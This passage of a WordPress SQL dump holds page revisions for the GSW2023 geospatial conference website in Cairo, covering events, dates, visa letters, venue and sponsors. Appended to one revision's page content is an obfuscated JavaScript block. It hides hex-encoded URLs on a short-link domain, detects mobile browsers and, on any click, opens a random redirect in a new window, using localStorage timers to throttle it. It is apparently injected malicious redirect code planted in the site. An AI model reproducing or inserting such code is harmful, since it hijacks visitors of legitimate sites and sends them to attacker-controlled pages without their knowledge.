center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570236779{margin-top: -20px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-24 01:32:04','2023-06-24 01:32:04','',3066,'https://gsw2023.com/?p=4794',0,'revision','',0),
(4795,1,'2023-06-24 01:34:54','2023-06-24 01:34:54','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 